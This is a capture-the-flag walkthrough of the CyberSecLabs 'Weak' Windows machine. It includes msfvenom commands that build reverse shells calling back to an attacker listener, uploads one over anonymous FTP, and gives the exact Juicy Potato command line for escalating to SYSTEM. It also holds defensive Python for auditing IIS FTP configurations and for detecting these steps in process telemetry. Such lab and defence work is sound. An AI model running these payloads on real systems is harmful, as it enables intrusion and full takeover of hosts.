CyberSecLabs Weak Walkthrough

Sentinal920
3 min read · Jun 23, 2020


RHOST = 172.31.1.11

LHOST = 172.21.1.1

Getting a Foothold

Weak is a Windows machine with port 80 open, which serves the default IIS welcome page.
It also allows anonymous FTP login, so we can upload an ASPX reverse shell over FTP and trigger it from the browser to get a shell back.

msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1 lport=443 -f aspx > shell.aspx

Uploading Shell.aspx

http://172.31.1.11/shell.aspx

Execute Shell.aspx
Getting a shell back
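The foothold above works because anonymous FTP can write into a directory that IIS also serves, so an uploaded ASPX file runs as code. As an added example (not part of this walkthrough), the Python below audits an IIS applicationHost.config for exactly that combination: an FTP site with anonymous authentication enabled, an authorization rule granting Write to all users (`*`) or anonymous users (`?`), and an FTP root that overlaps a web site's root. The config fragment, site names and paths are constructed for the example; the function name `audit_ftp_sites` is mine. On a real host the file lives at %windir%\System32\inetsrv\config\applicationHost.config.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed applicationHost.config fragment (not taken from the Weak machine):
# one web site and one FTP site sharing C:\inetpub\wwwroot, anonymous FTP
# authentication switched on, and a Write rule for every user.
SAMPLE_CONFIG = """<configuration>
  <system.applicationHost>
    <sites>
      <site name="Default Web Site" id="1">
        <application path="/">
          <virtualDirectory path="/" physicalPath="C:\\inetpub\\wwwroot" />
        </application>
      </site>
      <site name="Default FTP Site" id="2">
        <application path="/">
          <virtualDirectory path="/" physicalPath="C:\\inetpub\\wwwroot" />
        </application>
        <ftpServer>
          <security>
            <authentication>
              <anonymousAuthentication enabled="true" />
              <basicAuthentication enabled="false" />
            </authentication>
          </security>
        </ftpServer>
      </site>
    </sites>
  </system.applicationHost>
  <location path="Default FTP Site">
    <system.ftpServer>
      <security>
        <authorization>
          <add accessType="Allow" users="*" permissions="Read, Write" />
        </authorization>
      </security>
    </system.ftpServer>
  </location>
</configuration>
"""


def _norm(path: str) -> str:
    """Normalise a Windows path for comparison."""
    return path.replace("/", "\\").rstrip("\\").lower()


def audit_ftp_sites(config_xml: str) -> List[Dict]:
    """Return one finding per FTP site describing how exposed it is."""
    root = ET.fromstring(config_xml)
    sites = root.findall("./system.applicationHost/sites/site")

    # Root physical path of every site; a site without <ftpServer> is a web site.
    roots, is_ftp = {}, {}
    for site in sites:
        vdir = site.find("./application[@path='/']/virtualDirectory[@path='/']")
        if vdir is not None and vdir.get("physicalPath"):
            roots[site.get("name")] = _norm(vdir.get("physicalPath"))
        is_ftp[site.get("name")] = site.find("ftpServer") is not None
    web_roots = {n: p for n, p in roots.items() if not is_ftp[n]}

    findings = []
    for site in sites:
        name = site.get("name")
        if not is_ftp[name]:
            continue
        anon = site.find("./ftpServer/security/authentication/anonymousAuthentication")
        anonymous = anon is not None and anon.get("enabled", "false").lower() == "true"

        # FTP authorization rules live under <location path="site name">.
        # users="*" is everyone, users="?" is the anonymous user.
        write_all = False
        for loc in root.findall("./location"):
            if loc.get("path") != name:
                continue
            for rule in loc.findall("./system.ftpServer/security/authorization/add"):
                if (rule.get("accessType", "Allow") == "Allow"
                        and rule.get("users", "") in ("*", "?")
                        and "write" in rule.get("permissions", "").lower()):
                    write_all = True

        # Does the FTP root sit inside (or contain) a web site's root?
        ftp_root = roots.get(name, "")
        shared = [n for n, p in web_roots.items()
                  if ftp_root == p or ftp_root.startswith(p + "\\") or p.startswith(ftp_root + "\\")]

        if anonymous and write_all and shared:
            severity = "critical"   # anonymous upload straight into the web root
        elif anonymous and write_all:
            severity = "high"
        elif anonymous:
            severity = "medium"
        else:
            severity = "info"
        findings.append({"site": name, "anonymous_auth": anonymous,
                         "anonymous_write": write_all, "shares_root_with": shared,
                         "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in audit_ftp_sites(SAMPLE_CONFIG):
        print(finding)
```

The critical case is the one this box exhibits: disabling anonymous authentication, dropping Write from the anonymous rule, or moving the FTP root out of the web root each downgrades the finding, and the check reports which of the three is still in place.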

Privilege Escalation

Running whoami /priv shows that SeImpersonatePrivilege is enabled,
so we can perform the Juicy Potato attack.

SeImpersonatePrivilege Enabled

Running systeminfo, we learn that it is a Windows 7 machine.

Windows 7 x64

OK, so how do we perform the Juicy Potato attack?

To run Juicy Potato we need a few arguments:

JuicyPotato Arguments

JuicyPotato.exe -l {Any_Port} -p {Program_To_Execute} -t * -c {CLSID_Value}

For {Any_Port} we can use literally any free port that is not blocked by Windows.

For {Program_To_Execute} we can generate an exe reverse shell with msfvenom and have Juicy Potato execute it to get a shell back.

For {CLSID_Value} we have to find the correct CLSID value from the list.

How to find CLSID_Value?

Download the CLSID list for the target operating system:

https://github.com/ohpe/juicy-potato/tree/master/CLSID

CLSID lists are currently available for the following operating systems:

  1. Windows_10_Enterprise
  2. Windows_10_Pro
  3. Windows_7_Enterprise
  4. Windows_8.1_Enterprise
  5. Windows_Server_2008_R2_Enterprise
  6. Windows_Server_2012_Datacenter
  7. Windows_Server_2016_Standard

In this scenario the target is Windows 7, so grab the CLSID.list for Windows 7 from that directory.

Next, download the TestCLSID.bat file, which tests every CLSID in the CLSID.list we pass to it.

https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat

Now upload JuicyPotato.exe, TestCLSID.bat and CLSID.list to the same folder on the victim machine.

Upload all in same folder

Then run TestCLSID.bat from the shell and let it run for about 5 minutes.

It iterates over the CLSIDs in CLSID.list and stores the output in result.log.

Open result.log and you should find many CLSIDs there.

Working CLSIDs

Select any one CLSID from this list, but make sure it runs with higher privileges (i.e. as NT AUTHORITY\SYSTEM) rather than as the current user.

JuicyPotato.exe -l {Any_Port} -p {Program_To_Execute} -t * -c {CLSID_Value}

Now we have all the pieces that need to be put in place:

{Any_Port} = 1337

{Program_To_Execute} = shell.exe (Generated by msfvenom)

msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1 lport=443 -f exe -o shell.exe

{CLSID_Value} = 687e55ca-6621-4c41-b9f1-c0eddc94bb05

Execute Juicy Potato

Execute

JuicyPotato.exe -l 1337 -p C:\Users\Public\Downloads\shell.exe -t * -c {687e55ca-6621-4c41-b9f1-c0eddc94bb05}

And we get an NT AUTHORITY\SYSTEM shell back on port 443.
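From the defender's side, both steps of this box leave a recognisable trail in process-creation telemetry. As an added example (not from the walkthrough), the Python below runs two heuristics over constructed events whose field names loosely follow Sysmon Event ID 1 (ProcessCreate): an IIS worker process (w3wp.exe) spawning a command shell, which is what the ASPX reverse shell looks like, and a process running as NT AUTHORITY\SYSTEM whose parent ran as a service account, which is what the Juicy Potato payload looks like, since the tool's own process is the parent of the SYSTEM process it starts. The event records, account names and the functions `classify` and `scan` are constructed for this example.

```python
from typing import Dict, List, Tuple

# Constructed process-creation events (not captured from the Weak machine).
# Fields loosely mirror Sysmon Event ID 1: Image, User, ParentImage, ParentUser.
SAMPLE_EVENTS = [
    {   # ASPX reverse shell: the IIS worker process spawns cmd.exe
        "image": r"C:\Windows\System32\cmd.exe",
        "user": r"IIS APPPOOL\DefaultAppPool",
        "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
        "parent_user": r"IIS APPPOOL\DefaultAppPool",
    },
    {   # Juicy Potato: a service-account process starts a SYSTEM child
        "image": r"C:\Users\Public\Downloads\shell.exe",
        "user": r"NT AUTHORITY\SYSTEM",
        "parent_image": r"C:\Users\Public\Downloads\JuicyPotato.exe",
        "parent_user": r"IIS APPPOOL\DefaultAppPool",
    },
    {   # Benign: the service control manager starting a service host
        "image": r"C:\Windows\System32\svchost.exe",
        "user": r"NT AUTHORITY\SYSTEM",
        "parent_image": r"C:\Windows\System32\services.exe",
        "parent_user": r"NT AUTHORITY\SYSTEM",
    },
]

IIS_WORKER = "w3wp.exe"
SHELLS = {"cmd.exe", "powershell.exe"}
SYSTEM = "nt authority\\system"
# Accounts that commonly hold SeImpersonatePrivilege but should never
# be the parent of a SYSTEM process under normal operation.
SERVICE_ACCOUNT_PREFIXES = (
    "iis apppool\\",
    "nt authority\\network service",
    "nt authority\\local service",
)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the heuristics this event matches (possibly none)."""
    hits = []
    parent = _basename(event["parent_image"])
    child = _basename(event["image"])
    user = event["user"].lower()
    parent_user = event["parent_user"].lower()

    # Heuristic 1: web shell behaviour. The IIS worker process has no
    # business launching an interactive shell.
    if parent == IIS_WORKER and child in SHELLS:
        hits.append("iis_worker_spawned_shell")

    # Heuristic 2: token-impersonation escalation. A process owned by a
    # service account created a child that runs as SYSTEM.
    if (user == SYSTEM and parent_user != SYSTEM
            and parent_user.startswith(SERVICE_ACCOUNT_PREFIXES)):
        hits.append("service_account_spawned_system_process")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (image, matched heuristics) for every event that matched."""
    results = []
    for event in events:
        hits = classify(event)
        if hits:
            results.append((event["image"], hits))
    return results


if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(hits)}")
```

Heuristic 2 keys on the account change rather than on the tool's file name, so renaming JuicyPotato.exe does not evade it; the price is that legitimate installers or management agents running under a service account may also trip it, and those need an allowlist keyed on the parent image's signed path rather than a loosening of the rule.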

That’s it for this simple walkthrough of an easy Windows machine. I hope you learned something from it!
